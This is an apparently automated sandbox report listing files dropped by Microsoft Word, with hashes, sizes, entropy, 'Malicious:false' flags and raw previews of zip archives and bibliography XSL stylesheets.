                              SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                              MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                              SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                              SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                              SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                              Malicious:false
                              Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):6448
                              Entropy (8bit):7.897260397307811
                              Encrypted:false
                              SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                              MD5:42A840DC06727E42D42C352703EC72AA
                              SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                              SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                              SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                              Malicious:false
                              Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):5630
                              Entropy (8bit):7.87271654296772
                              Encrypted:false
                              SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                              MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                              SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                              SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                              SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                              Malicious:false
                              Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):6193
                              Entropy (8bit):7.855499268199703
                              Encrypted:false
                              SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                              MD5:031C246FFE0E2B623BBBD231E414E0D2
                              SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                              SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                              SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                              Malicious:false
                              Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):3075
                              Entropy (8bit):7.716021191059687
                              Encrypted:false
                              SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                              MD5:67766FF48AF205B771B53AA2FA82B4F4
                              SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                              SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                              SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                              Malicious:false
                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):5151
                              Entropy (8bit):7.859615916913808
                              Encrypted:false
                              SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                              MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                              SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                              SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                              SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                              Malicious:false
                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):333258
                              Entropy (8bit):4.654450340871081
                              Encrypted:false
                              SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                              MD5:5632C4A81D2193986ACD29EADF1A2177
                              SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                              SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                              SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):296658
                              Entropy (8bit):5.000002997029767
                              Encrypted:false
                              SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                              MD5:9AC6DE7B629A4A802A41F93DB2C49747
                              SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                              SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                              SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):268317
                              Entropy (8bit):5.05419861997223
                              Encrypted:false
                              SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                              MD5:51D32EE5BC7AB811041F799652D26E04
                              SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                              SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                              SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):255948
                              Entropy (8bit):5.103631650117028
                              Encrypted:false
                              SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                              MD5:9888A214D362470A6189DEFF775BE139
                              SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                              SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                              SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):251032
                              Entropy (8bit):5.102652100491927
                              Encrypted:false
                              SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                              MD5:F425D8C274A8571B625EE66A8CE60287
                              SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                              SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                              SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):284415
                              Entropy (8bit):5.00549404077789
                              Encrypted:false
                              SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                              MD5:33A829B4893044E1851725F4DAF20271
                              SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                              SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                              SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):294178
                              Entropy (8bit):4.977758311135714
                              Encrypted:false
                              SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                              MD5:0C9731C90DD24ED5CA6AE283741078D0
                              SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                              SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                              SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):270198
                              Entropy (8bit):5.073814698282113
                              Encrypted:false
                              SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                              MD5:FF0E07EFF1333CDF9FC2523D323DD654
                              SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                              SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                              SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):217137
                              Entropy (8bit):5.068335381017074
                              Encrypted:false
                              SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                              MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                              SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                              SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                              SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):254875
                              Entropy (8bit):5.003842588822783
                              Encrypted:false
                              SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                              MD5:377B3E355414466F3E3861BCE1844976
                              SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                              SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                              SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                              Malicious:false
